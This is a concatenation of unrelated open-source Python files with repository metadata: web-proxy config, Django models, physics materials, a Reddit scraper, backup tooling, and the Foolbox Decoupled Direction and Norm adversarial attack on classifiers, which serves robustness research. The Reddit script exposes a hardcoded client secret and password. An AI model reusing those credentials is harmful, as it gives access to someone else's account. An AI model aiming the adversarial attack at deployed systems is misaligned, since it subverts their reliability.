# contains a query string. We will use this to construct a redirect with a
# query string only if needed.
# - req.subpath: will be set to the remainder of the path, if anything,
# after removing /chutes/<chutename>, e.g. "/chutes/hello-world/index.html"
# becomes "/index.html". This does not include the query string.
frontend = {
"header": "frontend http-in",
"lines": [
"bind *:80",
"default_backend portal",
"http-request set-var(req.querymarker) str(?) if { query -m found }",
"http-request set-var(req.subpath) path,regsub(^/chutes/[^/]+,)"
]
}
sections.append(frontend)
chuteStore = ChuteStorage()
chutes = chuteStore.getChuteList()
for chute in chutes:
port, service = chute.get_web_port_and_service()
if port is None or service is None:
continue
container = ChuteContainer(service.get_container_name())
if not container.isRunning():
continue
# Generate a rule that matches HTTP host header to chute name.
frontend['lines'].append("acl host_{} hdr(host) -i {}.chute.paradrop.org".format(
chute.name, chute.name))
frontend['lines'].append("use_backend {} if host_{}".format(
chute.name, chute.name))
# Generate rules that matches the beginning of the URL.
# We need to be careful and either have an exact match
# or make sure there is a slash or question mark after the chute name
# to avoid mix-ups, e.g. "sticky-board" and "sticky-board-new".
frontend['lines'].append("acl path_{} url /chutes/{}".format(
chute.name, chute.name))
frontend['lines'].append("acl path_{} url_beg /chutes/{}/".format(
chute.name, chute.name))
frontend['lines'].append("acl path_{} url_beg /chutes/{}?".format(
chute.name, chute.name))
# Try to find a host binding for the web port to redirect:
# http://<host addr>/chutes/<chute>/<path> ->
# http://<host addr>:<chute port>/<path>
#
# We need to do a lookup because the host port might be dynamically
# assigned by Docker.
#
# Use HTTP code 302 for the redirect, which will not be cached by the
# web browser. The port portion of the URL can change whenever the
# chute restarts, so we don't want web browsers to cache it. Browsers
# will cache a 301 (Moved Permanently) response.
portconf = container.getPortConfiguration(port, "tcp")
if len(portconf) > 0:
# TODO: Are there other elements in the list?
binding = portconf[0]
frontend['lines'].append("http-request replace-value Host (.*):(.*) \\1")
frontend['lines'].append("http-request redirect location http://%[req.hdr(host)]:{}%[var(req.subpath)]%[var(req.querymarker)]%[query] code 302 if path_{}".format(
binding['HostPort'], chute.name))
# Add a server at the chute's IP address.
sections.append({
"header": "backend {}".format(chute.name),
"lines": [
"server {} {}:{} maxconn 256".format(chute.name,
container.getIP(), port)
]
})
return sections
def writeConfigFile(output):
sections = generateConfigSections()
for section in sections:
output.write(section['header'] + "\n")
for line in section['lines']:
output.write(" " + line + "\n")
output.write("\n")
def reconfigureProxy(update):
"""
Reconfigure haproxy with forwarding and redirect rules.
"""
confFile = os.path.join(settings.RUNTIME_HOME_DIR, "haproxy.conf")
pidFile = os.path.join(settings.TMP_DIR, "haproxy.pid")
with open(confFile, "w") as output:
writeConfigFile(output)
cmd = ["haproxy", "-f", confFile, "-p", pidFile]
if os.path.exists(pidFile):
with open(pidFile, "r") as source:
pid = source.read().strip()
cmd.extend(["-sf", pid])
subprocess.call(cmd)
|
[
"hartung@cs.wisc.edu"
] |
hartung@cs.wisc.edu
|
09db562a43a4de24b3c2c642181d463e0a4b80ae
|
6d9795fa1aafc0fa5316020aaa0eaa4f68b76229
|
/sellproperty/models.py
|
63aa8f893cb9dcbfbd6429438758eeac799571cd
|
[] |
no_license
|
icerahi/immolists
|
02d379a22c193e793b26e35828b5eebff33bf888
|
813333c3923385861f111bb7aa715aeb04108c3a
|
refs/heads/master
| 2022-12-15T15:00:39.844142
| 2022-01-06T10:06:44
| 2022-01-06T10:06:44
| 196,600,572
| 0
| 0
| null | 2022-11-22T04:14:43
| 2019-07-12T15:12:33
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 6,052
|
py
|
import os
import random
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from ckeditor.fields import RichTextField
from ckeditor_uploader.fields import RichTextUploadingField
from django.conf import settings
from django.db import models
from django.db.models.signals import pre_save
from django.dispatch import receiver
from django.urls import reverse
from django.utils.text import slugify
from djmoney.models.fields import MoneyField
from phonenumber_field.modelfields import PhoneNumberField
from embed_video.fields import EmbedVideoField
from places.fields import PlacesField
class Category(models.Model):
name=models.CharField(max_length=200,unique=True,)
def __str__(self):
return f"{self.name}"
class Type(models.Model):
name=models.CharField(max_length=200,unique=True)
category=models.ForeignKey(Category,related_name='category',on_delete=models.CASCADE)
def __str__(self):
return f"{self.name}"
class PublishedManager(models.Manager):
def get_queryset(self):
return super(PublishedManager, self).get_queryset().filter(status='published')
class AllObjectManager(models.Manager):
def get_queryset(self):
return super(AllObjectManager, self).get_queryset()
def get_filename_extention(filepath):
base_name=os.path.basename(filepath)
name,ext=os.path.splitext(base_name)
return name,ext
def upload_image_path(instance,filename):
new_filename=random.randint(1,1234567876543211)
name,ext=get_filename_extention(filename)
final_filename='{new_filename}{ext}'.format(new_filename=filename,ext=ext)
return 'sellproperty/{new_filename}/{final_filename}'.format(
new_filename=new_filename,
final_filename=final_filename
)
class SellProperty(models.Model):
STATUS_CHOICES=(
('draf','Draft'),
('published','Published')
)
ACTION_FOR=(('sale','Sale',),
('rent','Rent')
)
RENT_PER=(("nothing","One Time Price (For sale)"),
('month','PER MONTH'),
('year','PER YEAR'))
realator = models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE)
category =models.ForeignKey(Category,on_delete=models.CASCADE)
type =models.ForeignKey(Type,on_delete=models.CASCADE)
title =models.CharField(max_length=200)
full_description =RichTextUploadingField()
key_features =RichTextField()
min_price = MoneyField(max_digits=14, decimal_places=2, default_currency='USD')
max_price = MoneyField(max_digits=14, decimal_places=2, default_currency='USD')
created =models.DateTimeField(auto_now_add=True)
updated =models.DateTimeField(auto_now=True)
slug = models.SlugField()
status =models.CharField(max_length=12,choices=STATUS_CHOICES,default='published')
published =PublishedManager() #Costom model manager
objects =AllObjectManager() # Costom model manager
main_image =models.ImageField(upload_to=upload_image_path,default='default.jpg')
image_2 =models.ImageField(upload_to=upload_image_path,null=True,blank=True)
image_3 =models.ImageField(upload_to=upload_image_path,null=True,blank=True)
views = models.PositiveIntegerField(default=0, blank=True)
favourite =models.ManyToManyField(settings.AUTH_USER_MODEL,blank=True,related_name='favourite')
video = EmbedVideoField(null=True,blank=True)
action =models.CharField(max_length=6,choices=ACTION_FOR)
rent_per =models.CharField(max_length=30,choices=RENT_PER,null=True,blank=True)
location = PlacesField(blank=True)
def __unicode__(self):
return self.location.place
def __str__(self):
return f"{self.title}"
class Meta:
ordering=['-created']
def get_update_url(self,*args,**kwargs):
return reverse('dashboard:sell_update',kwargs={'pk':self.pk,'slug':self.slug})
def get_delete_url(self,*args,**kwargs):
return reverse('dashboard:sell_delete',kwargs={'pk':self.pk,'slug':self.slug})
def get_absolute_url(self,*args,**kwargs):
return reverse('site:detail',kwargs={'pk':self.pk,'slug':self.slug})
@receiver(pre_save,sender=SellProperty)
def pre_save_slug(sender,**kwargs):
slug=slugify(kwargs['instance'].title)
kwargs['instance'].slug=slug
class EnquiryManager(models.Manager):
def get_come(self,user):
return super(EnquiryManager, self).get_queryset().filter(property__realator=user)
def get_send(self,user):
return super(EnquiryManager, self).get_queryset().filter(email=user.email)
class Enquiry(models.Model):
property=models.ForeignKey(SellProperty,on_delete=models.CASCADE,related_name='enquiry')
name =models.CharField(max_length=100,blank=False,null=False)
email=models.EmailField(blank=False,null=False)
phone=PhoneNumberField(blank=True,null=True)
message=models.TextField(blank=False,null=False)
time =models.DateTimeField(auto_now_add=True)
objects=EnquiryManager()
def __str__(self):
return f'{self.name}'
class Meta:
ordering=['-time']
def get_come_delete_url(self,*args,**kwargs):
return reverse('dashboard:enquirycome_delete',kwargs={'pk':self.pk})
def get_send_delete_url(self,*args,**kwargs):
return reverse('dashboard:enquirysend_delete',kwargs={'pk':self.pk})
class MakeOffer(models.Model):
property=models.ForeignKey(SellProperty,on_delete=models.CASCADE,related_name='make_offer')
discount=models.DecimalField(max_digits=3,decimal_places=0)
time=models.DateTimeField(auto_now_add=True)
objects=AllObjectManager()
def get_delete_url(self,*args,**kwargs):
return reverse('dashboard:offer_remove',kwargs={
'pk':self.pk,
})
def __str__(self):
return f'{self.discount}'
class Meta:
ordering=['-time']
|
[
"zanjarwhite@gmail.com"
] |
zanjarwhite@gmail.com
|
f6cbe10ec60a3e67c3d01909eb6787f81d784725
|
52b5fa23f79d76883728d8de0bfd202c741e9c43
|
/kubernetes/test/test_v1_horizontal_pod_autoscaler.py
|
315840a3d5385881407d0c8128db6c771a02de99
|
[] |
no_license
|
kippandrew/client-python-tornado
|
5d00810f57035825a84e37ff8fc89a7e79aed8da
|
d479dfeb348c5dd2e929327d800fe033b5b3b010
|
refs/heads/master
| 2021-09-04T13:01:28.275677
| 2018-01-18T23:27:34
| 2018-01-18T23:27:34
| 114,912,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,037
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1.8.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import kubernetes.client
from kubernetes.client.models.v1_horizontal_pod_autoscaler import V1HorizontalPodAutoscaler # noqa: E501
from kubernetes.client.rest import ApiException
class TestV1HorizontalPodAutoscaler(unittest.TestCase):
"""V1HorizontalPodAutoscaler unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1HorizontalPodAutoscaler(self):
"""Test V1HorizontalPodAutoscaler"""
# FIXME: construct object with mandatory attributes with example values
# model = kubernetes.client.models.v1_horizontal_pod_autoscaler.V1HorizontalPodAutoscaler() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"andy@rstudio.com"
] |
andy@rstudio.com
|
89e06687f93fce54b05689e3792cc5692934b929
|
da497ddf926b8791f3812c79543120215822216b
|
/icsbep/pu-sol-therm-012/openmc/case-14/generate_materials.py
|
8eab1d8d6513479d03829680991c284d7261e01d
|
[] |
no_license
|
mit-crpg/benchmarks
|
55f38e569699554d07df254103e2f828dc5b4ff8
|
58e15679ec684b9e2f552df58099e3648b5708cc
|
refs/heads/master
| 2022-05-17T12:27:45.590757
| 2022-05-09T15:07:00
| 2022-05-09T15:07:00
| 2,704,358
| 23
| 30
| null | 2019-11-11T16:35:27
| 2011-11-03T19:04:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,822
|
py
|
import openmc
mats = openmc.Materials()
mat = openmc.Material(1)
mat.name = "Plutonium nitrate solution (52.7 g/L)"
mat.set_density('sum')
mat.add_nuclide('Pu239', 9.86655e-05)
mat.add_nuclide('Pu240', 2.50004e-05)
mat.add_nuclide('Pu241', 7.41089e-06)
mat.add_nuclide('Pu242', 1.49702e-06)
mat.add_nuclide('Am241', 8.03099e-07)
mat.add_element('N', 1.78497e-03)
mat.add_element('O', 3.59564e-02)
mat.add_nuclide('H1', 6.24015e-02)
mat.add_element('Fe', 1.21850e-05)
mat.add_element('Cr', 3.91841e-06)
mat.add_element('Ni', 2.77719e-06)
mat.add_s_alpha_beta('c_H_in_H2O')
mats.append(mat)
mat = openmc.Material(2)
mat.name = "Air"
mat.set_density('sum')
mat.add_nuclide('O16', 1.0784e-05)
mat.add_nuclide('N14', 4.3090e-05)
mats.append(mat)
mat = openmc.Material(3)
mat.name = "Stainless steel"
mat.set_density('sum')
mat.add_element('Fe', 6.1344e-02)
mat.add_element('Cr', 1.6472e-02)
mat.add_element('Ni', 8.1050e-03)
mats.append(mat)
mat = openmc.Material(4)
mat.name = "Lucoflex"
mat.set_density('sum')
mat.add_element('C', 2.7365e-02)
mat.add_nuclide('H1', 4.1047e-02)
mat.add_element('Cl', 1.3682e-02)
mats.append(mat)
mat = openmc.Material(5)
mat.name = "Water"
mat.set_density('sum')
mat.add_nuclide('H1', 6.6688e-02)
mat.add_element('O', 3.3344e-02)
mat.add_s_alpha_beta('c_H_in_H2O')
mats.append(mat)
mat = openmc.Material(6)
mat.name = "Steel (pool wall)"
mat.set_density('sum')
mat.add_element('Fe', 8.5068e-02)
mat.add_element('C', 5.5545e-04)
mats.append(mat)
mat = openmc.Material(7)
mat.name = "Concrete"
mat.set_density('sum')
mat.add_nuclide('H1', 1.035e-02)
mat.add_nuclide('B10', 1.602e-06)
mat.add_element('O', 4.347e-02)
mat.add_element('Al', 1.563e-03)
mat.add_element('Si', 1.417e-02)
mat.add_element('Ca', 6.424e-03)
mat.add_element('Fe', 7.621e-04)
mats.append(mat)
mats.export_to_xml()
|
[
"paul.k.romano@gmail.com"
] |
paul.k.romano@gmail.com
|
2fc35c78749760c361cd5b6ea2884fc7fd16bb07
|
f8a66f137d53306d1f05db6a2a6a0f4d0bd5acf1
|
/Cyber-Main/JSL_Threat_Intel_Framework_whodat/a.py
|
f08854459bb01f5f6acedb36866ec7d61afe6614
|
[] |
no_license
|
sec-js/JSL-Cyber-ThreatIntelCore
|
5d9e63a5fca0b0d2e250d682332ad86286277205
|
a66c350b42c7ed95a4e3703e82983626fdab8ab7
|
refs/heads/master
| 2020-12-03T12:46:53.319750
| 2017-02-03T19:32:30
| 2017-02-03T19:32:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,957
|
py
|
import csv
def write_final_output(dico):
f = open("outputfile", 'w')
f.write(
'pipelineid' + ',' + 'datauploadid' + ',' + 'uuid' + ',' + 'referential' + ',' + 'datasourcename' + ',' + 'date' + ',' + 'cog' + ',' + 'model' + ',' + 'concept' \
+ ',' + 'segment' + ',' + 'pedigree' + ',' + 'confidence_score' + ',' + 'ipaddress' + ',' + 'ipaddress_int' + ',' + 'offenderclass' + ',' + 'first_observed_date' + ',' + 'first_observed_time' + ',' + \
'most_recent_observation_date' + ',' + 'most_recent_observation_time' + ',' + 'total_observations' + ',' + 'blranking' + ',' + 'threat_score' + ',' + 'total_capabilities' + ',' + \
'commvett' + ',' + 'commdatevett' + ',' + 'govvett' + ',' + 'govdatevett' + ',' + 'countryabbrv' + ',' + 'country' + ',' + 'city' + ',' + 'coordinates' + ',' + 'geo_longitude' + ',' + 'geo_latitude' \
+ ',' + 'isp' + ',' + 'domain' + ',' + 'netspeed' + ',' + 'network_asn' + ',' + 'network_class' + ',' + 'network_type' + ',' + 'active boolean' + ',' + 'insrtdttm' + ',' + 'updtdttm' + '\n')
for entry in dico:
f.write(str(entry['pipelineid']) + ',' + str(entry['datauploadid']) + ',' + str(entry['uuid']) + ',' + str(
entry['referential']) + ',' + str(entry['datasourcename']) + ',' + str(entry['date']) + ',' + str(
entry['cog']) + ',' + str(entry['model']) + ',' + str(entry['concept']) \
+ ',' + str(entry['segment']) + ',' + str(entry['pedigree']) + ',' + str(
entry['confidence_score']) + ',' + str(entry['ipaddress']) + ',' + str(entry['ipaddress_int']) + ',' + str(
entry['offenderclass']) + ',' + str(entry['first_observed_date']) + ',' + str(
entry['first_observed_time']) + ',' + \
str(entry['most_recent_observation_date']) + ',' + str(
entry['most_recent_observation_time']) + ',' + str(entry['total_observations']) + ',' + str(
entry['blranking']) + ',' + str(entry['threat_score']) + ',' + str(entry['total_capabilities']) + ',' + \
str(entry['commvett']) + ',' + str(entry['commdatevett']) + ',' + str(entry['govvett']) + ',' + str(
entry['govdatevett']) + ',' + str(entry['countryabbrv']) + ',' + str(entry['country']) + ',' + str(
entry['city']) + ',' + str(entry['coordinates']) + ',' + str(entry['geo_longitude']) + ',' + str(
entry['geo_latitude']) \
+ ',' + str(entry['isp']) + ',' + str(entry['domain']) + ',' + str(entry['netspeed']) + ',' + str(
entry['network_asn']) + ',' + str(entry['network_class']) + ',' + str(entry['network_type']) + ',' + str(
entry['active boolean']) + ',' + str(entry['insrtdttm']) + ',' + str(entry['updtdttm']) + '\n')
with open('test.csv') as f:
reader = csv.reader(f, skipinitialspace=True)
header = next(reader)
a = [dict(zip(header, map(str, row))) for row in reader]
write_final_output(a)
|
[
"jonathan@johnsnowlabs.com"
] |
jonathan@johnsnowlabs.com
|
66dc0f2daff11b6cce93fd0485b61c72d2d44f92
|
1adc05008f0caa9a81cc4fc3a737fcbcebb68995
|
/hardhat/recipes/pango.py
|
534919580c9ee2d79f2ed539a86e1db554ea72c2
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
stangelandcl/hardhat
|
4aa995518697d19b179c64751108963fa656cfca
|
1ad0c5dec16728c0243023acb9594f435ef18f9c
|
refs/heads/master
| 2021-01-11T17:19:41.988477
| 2019-03-22T22:18:44
| 2019-03-22T22:18:52
| 79,742,340
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 725
|
py
|
from .base import GnuRecipe
class PangoRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(PangoRecipe, self).__init__(*args, **kwargs)
self.sha256 = '1d2b74cd63e8bd41961f2f8d952355aa' \
'0f9be6002b52c8aa7699d9f5da597c9d'
self.name = 'pango'
self.depends = ['cairo', 'fontconfig', 'glib', 'harfbuzz']
self.version = '1.42.4'
self.version_regex = '(?P<version>\d+\.\d+)'
self.version_url = 'http://ftp.gnome.org/pub/GNOME/sources/pango/'
short_version = '.'.join(self.version.split('.')[:2])
self.url = 'http://ftp.gnome.org/pub/gnome/sources/$name/' \
'%s/$name-$version.tar.xz' % short_version
|
[
"clayton.stangeland@gmail.com"
] |
clayton.stangeland@gmail.com
|
c85c460a448c4a63602d3d96b271abbdb9f524f3
|
afbcda99c55aeb26360d593f1abe99afbbb1d1b7
|
/Python/Temppraw/temppraw.py
|
e6309910cf300fdc9d0c9bc4b437f7b346c77495
|
[] |
no_license
|
cstuartroe/misc
|
b4c4fb2f8ef7341acf99f35e9eece1cf3769a0fc
|
307b00c3ab7e51204401e84bd6c4466315889dfe
|
refs/heads/master
| 2023-08-17T19:07:59.535257
| 2023-08-06T16:07:27
| 2023-08-06T16:07:27
| 156,424,382
| 0
| 0
| null | 2022-05-25T02:00:29
| 2018-11-06T17:50:34
|
Java
|
UTF-8
|
Python
| false
| false
| 859
|
py
|
import praw
import time
import datetime
current = time.time()
reddit = praw.Reddit(client_id='PTofuEjEjIPbcg',
client_secret='_R0b3zmCvjXGPseYbaPIUEnZAlU',
password='LinguisticsIsCool208',
user_agent='testscript by /u/conor_emily_ling208',
username='conor_emily_ling208')
def get_worthwhile_posts():
reddit.read_only = True
rWP = reddit.subreddit('WritingPrompts')
posts = []
for submission in rWP.new(limit=500):
timestamp = submission.created
elapsed = int(current - timestamp + 28800)
score = submission.score
if (elapsed < 86400) and (score >= 4) and (elapsed/score < 3600) and (submission.num_comments <= 1):
posts.append({'title':submission.title,'score':score,'elapsed':elapsed//3600})
return posts
|
[
"cstuartroe@haverford.edu"
] |
cstuartroe@haverford.edu
|
fc216362a02225b2ff41c9073d1ca8277c088188
|
37c3b81ad127c9e3cc26fa9168fda82460ca9bda
|
/Baekjoon/boj_10711_모래성.py
|
3f23b08f4cb51446ea056e929f61c0ec51f93fab
|
[] |
no_license
|
potomatoo/TIL
|
5d85b69fdaed68966db7cfe2a565b7c64ed3e816
|
395dc190fa13e5ed036e1e3c7d9e0bc2e1ee4d6c
|
refs/heads/master
| 2021-07-08T16:19:40.410097
| 2021-04-19T02:33:40
| 2021-04-19T02:33:40
| 238,872,774
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 700
|
py
|
N, M = map(int,input().split())
castle = [list(map(str,[*input()])) for _ in range(N)]
search = []
for y in range(N):
for x in range(M):
if castle[y][x] != '.' and castle[y][x] != '9':
castle[y][x] = int(castle[y][x])
search.append((y, x, 0, 0))
dy = [-1, 1, 0, 0, -1, -1, 1, 1]
dx = [0, 0, -1, 1, -1, 1, 1, -1]
for y in range(N):
for x in range(M):
if castle[y][x] != '.' and castle[y][x] != '9':
for i in range(4):
ty = y + dy[i]
tx = x + dx[i]
if ty < 0 or tx < 0 or ty > N-1 or tx > M-1:
continue
if castle[ty][tx] == '.':
search
|
[
"duseh73@gmail.com"
] |
duseh73@gmail.com
|
602534b2b5640835f91753fe88773c67f8116f05
|
7da6ecf172b3e9354d93ddfe06f87b930fad90b3
|
/pickup/generator_profile/folder.py
|
8b6f79f8d7e9a8b25b0989cacbb483ad3f55c10e
|
[] |
no_license
|
exhuma/pickup
|
05f8d271de95d76b337a6994dcd21799fe0e4b34
|
688b05d0ae1276dcc386b45c8ddb1cea71b15cb1
|
refs/heads/master
| 2016-09-06T01:21:08.343607
| 2011-07-15T15:09:10
| 2011-07-15T15:09:10
| 1,059,260
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,683
|
py
|
"""
The folder plugin create a bzipped tar file for a specific folder. It is also
possible to specify a parent folder and create individual tarballs for each
folder and one for files beneath that folder.
Configuration
~~~~~~~~~~~~~
The following fields are used by this plugin:
**path** (string)
The folder
**split** (boolean) *optional*
If set to "True", this module will create individual tarballs (Default =
False).
Configuration Example
~~~~~~~~~~~~~~~~~~~~~
.. code-block:: python
dict(
name = 'My home folder',
profile = 'folder',
config = dict(
path = '/home/me',
split = True,
)
),
"""
import logging
import tarfile
import re
from os.path import exists, join, abspath, isdir
import os
LOG = logging.getLogger(__name__)
API_VERSION = (2,0)
CONFIG = {}
SOURCE = {}
def init(source):
"""
If split is set, this strategy will create one folder per subfolder in the
given path.
"""
CONFIG.update(source['config'])
SOURCE.update(source)
LOG.debug("Initialised '%s' with %r" % ( __name__, CONFIG))
def run(staging_area):
if not exists(CONFIG['path']):
LOG.error("Path '%s' does not exist! Skipping!" % CONFIG['path'])
return
if CONFIG.get("split", False):
create_split_tar(staging_area)
else:
create_simple_tar(staging_area)
def create_split_tar(staging_area):
"""
Creates one tar file for each folder found in CONFIG['path']. If normal
files reside in that folder, they will be collected into a special tarfile
named "__PICKUP_FILES__.tar.bz2"
@param staging_area: The target folder
"""
if not isdir(CONFIG['path']):
LOG.error("Impossible to create a split tar! %s is not a folder!" % CONFIG['path'])
return
LOG.info("Creating tarball for each folder inside %s" % CONFIG['path'])
if not exists(staging_area):
os.makedirs( staging_area )
elif not isdir(staging_area):
LOG.error("'%s' exists and is not a folder! Skipping" % staging_area)
return
files = []
for entry in os.listdir(CONFIG['path']):
entrypath = join(CONFIG['path'], entry)
# Add directories directly, and add normal files into a special filename
if not isdir(entrypath):
files.append(entrypath)
continue
tarname = join(staging_area, "%s.tar.bz2" % entry)
LOG.info("Writing to '%s'" % abspath(tarname))
tar = tarfile.open(abspath(tarname), "w:bz2")
tar.add(entrypath)
tar.close()
if files:
tarname = join(staging_area, "__PICKUP_FILES__.tar.bz2")
LOG.info("Writing remaining files to '%s'" % abspath(tarname))
tar = tarfile.open(abspath(tarname), "w:bz2")
for file in files:
LOG.info(" Adding %s" % file)
tar.add(file)
tar.close()
def get_basename():
"""
Create a 'clean' filename
"""
# replace non-ascii characters with underscores
basename = re.sub( r'[^a-zA-Z0-9]', "_", SOURCE['name'] )
# now remove all leading/trainling underscores
basename = basename.strip("_")
# prevent accidental overwrites
counter = 0
while exists(basename):
counter += 1
LOG.debug( "File %s exists. Adding a counter." % basename )
basename = "%s-%d" % (basename, counter)
return basename
def create_simple_tar(staging_area):
LOG.info("Creating tarball for path %s" % CONFIG['path'])
tarname = "%s.tar.bz2" % get_basename()
# put it into the staging area
tarname = join(staging_area, tarname)
LOG.info("Writing to '%s'" % abspath(tarname))
tar = tarfile.open(abspath(tarname), "w:bz2")
tar.add( CONFIG['path'] )
tar.close()
|
[
"michel@albert.lu"
] |
michel@albert.lu
|
4146e50a8525f3747cb0dca5aef9030f0519f149
|
295f34f4411d984f0ff6026be6e96fe134dc1550
|
/home/pi/antes/consulta.py
|
92d50b55d536b5cbe4a174bb77c1f2614a735a08
|
[] |
no_license
|
mcashjavier/disco-linux-raspy
|
1e3fed914b6040fa9972e7cfc7357ecb72070e8c
|
8c23103cf089059fbdadfad8cfb7059c1580da83
|
refs/heads/master
| 2022-12-20T17:06:39.967203
| 2019-03-12T12:09:22
| 2019-03-12T20:01:10
| 175,072,541
| 0
| 3
| null | 2022-12-18T06:59:27
| 2019-03-11T19:44:12
| null |
UTF-8
|
Python
| false
| false
| 2,093
|
py
|
from tkinter import *
import socket
import sys
def Salir():
ventana.destroy()
def MiSaldo():
if tarjeta.get():
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = ('181.164.238.87', 123)
print('connecting to %s port %s' % server_address)
sock.connect(server_address)
try:
# Send data
message = 'C' + tarjeta.get() #'C;1921000005618'
print('sending "%s"' % message)
sock.send(message.encode())
# Look for the response
amount_received = 0
amount_expected = 1#len(message)
while amount_received < amount_expected:
data = sock.recv(100)
amount_received += len(data)
print('received "%s"' % data.decode())
# Saldo.text=
Saldo.config(text = data.decode())
finally:
print('closing socket')
sock.close()
else:
Saldo.config(text = 'Escribi algo antes de mandar!!! *-*')
ventana = Tk()
ventana.attributes("-fullscreen", True)
ventana.configure(background='black')
#ventana.geometry("600x300+0+0")
ventana.title("Consulta de Saldo")
tarjeta = Entry(ventana, text = "-",justify='center',fg="white", font=("Helvetica", 14),background='black')
tarjeta.place(x = (ventana.winfo_screenwidth())/2-(ventana.winfo_screenwidth()/2), y = 140,width=ventana.winfo_screenwidth())
Saldo = Label(ventana, text = "-",fg="green", font=("Helvetica", 16),background='black')
Saldo.place(x = (ventana.winfo_screenwidth())/2-(ventana.winfo_screenwidth()/2), y = 160,width=ventana.winfo_screenwidth())
btn_estado = Button(ventana, text = "Consultar Saldo", command = MiSaldo,)
btn_estado.place(x = (ventana.winfo_screenwidth())/2-100, y = 100,width=200)
bsalir = Button(ventana, text = "Salir", command = Salir)
bsalir.place(x = (ventana.winfo_screenwidth())/2-100, y = 200,width=200)
ventana.mainloop()
|
[
"prog2@magneticash.com"
] |
prog2@magneticash.com
|
6e785160cfd23b23fd62580b0dd68b6ef5ba14f8
|
212daad1c33e796944fff2ca41788b872f6e6a0e
|
/plane_shotting/settings.py
|
522e673cca183d9cda49aedf39e87315251c4015
|
[] |
no_license
|
walter0909/python_scripts
|
ecae13b8931f791d241b8902a76629683e2fdccd
|
19156358ced7b8cc0107d390e74203ca5b320cb5
|
refs/heads/master
| 2023-02-25T12:53:53.795302
| 2021-02-03T06:07:28
| 2021-02-03T06:07:28
| 297,516,050
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 396
|
py
|
class Settings():
"""settings """
def __init__(self):
#screen
self.screen_width = 800
self.screen_height = 600
self.bg_color = (230,230,230)
self.ship_speed_factor = 1.5
self.bullet_speed_factor = 1
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = (60, 60, 60)
self.bullets_allowed = 3
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
529f4017618780f8663e90680936300e7bd47b4b
|
be7949a09fa8526299b42c4c27adbe72d59d2201
|
/cnns/foolbox/foolbox_2_3_0/v1/attacks/decoupled_direction_norm.py
|
ba84884374e569e8613766c56669d5399a107841
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
adam-dziedzic/bandlimited-cnns
|
375b5cccc7ab0f23d2fbdec4dead3bf81019f0b4
|
81aaa27f1dd9ea3d7d62b661dac40cac6c1ef77a
|
refs/heads/master
| 2022-11-25T05:40:55.044920
| 2020-06-07T16:14:34
| 2020-06-07T16:14:34
| 125,884,603
| 17
| 5
|
Apache-2.0
| 2022-11-21T21:01:46
| 2018-03-19T16:02:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,263
|
py
|
import math
import numpy as np
import logging
from .base import Attack
from .base import call_decorator
class DecoupledDirectionNormL2Attack(Attack):
"""The Decoupled Direction and Norm L2 adversarial attack from [1]_.
References
----------
.. [1] Jérôme Rony, Luiz G. Hafemann, Luiz S. Oliveira, Ismail Ben Ayed,
Robert Sabourin, Eric Granger, "Decoupling Direction and Norm for Efficient
Gradient-Based L2 Adversarial Attacks and Defenses",
https://arxiv.org/abs/1811.09600
"""
@call_decorator
def __call__(
self,
input_or_adv,
label=None,
unpack=True,
steps=100,
gamma=0.05,
initial_norm=1,
quantize=True,
levels=256,
):
"""The Decoupled Direction and Norm L2 adversarial attack.
Parameters
----------
input_or_adv : `numpy.ndarray` or :class:`Adversarial`
The original, unperturbed input as a `numpy.ndarray` or
an :class:`Adversarial` instance.
label : int
The reference label of the original input. Must be passed
if `a` is a `numpy.ndarray`, must not be passed if `a` is
an :class:`Adversarial` instance.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
steps : int
Number of steps for the optimization.
gamma : float, optional
Factor by which the norm will be modified.
new_norm = norm * (1 + or - gamma).
init_norm : float, optional
Initial value for the norm.
quantize : bool, optional
If True, the returned adversarials will have quantized values to
the specified number of levels.
levels : int, optional
Number of levels to use for quantization
(e.g. 256 for 8 bit images).
"""
a = input_or_adv
if not a.has_gradient():
logging.fatal(
"Applied gradient-based attack to model that "
"does not provide gradients."
)
return
min_, max_ = a.bounds()
s = max_ - min_
if a.target_class is not None:
multiplier = -1
attack_class = a.target_class
else:
multiplier = 1
attack_class = a.original_class
norm = initial_norm
unperturbed = a.unperturbed
perturbation = np.zeros_like(unperturbed)
for i in range(steps):
logits, grad, is_adv = a.forward_and_gradient_one(
unperturbed + perturbation, attack_class, strict=True
)
# renorm gradient and handle 0-norm gradient
grad_norm = np.linalg.norm(grad)
if grad_norm == 0: # pragma: no cover
grad = np.random.normal(size=grad.shape)
grad_norm = np.linalg.norm(grad)
grad *= s / grad_norm
# udpate perturbation
lr = cosine_learning_rate(i, steps, 1.0, 0.01)
perturbation += lr * multiplier * grad
# update norm value and renorm perturbation accordingly
norm *= 1 - (2 * is_adv - 1) * gamma
perturbation *= s * norm / np.linalg.norm(perturbation)
if quantize:
perturbation = (perturbation - min_) / s
perturbation = np.round(perturbation * (levels - 1))
perturbation /= levels - 1
perturbation = perturbation * s + min_
perturbation = np.clip(perturbation, min_ - unperturbed, max_ - unperturbed)
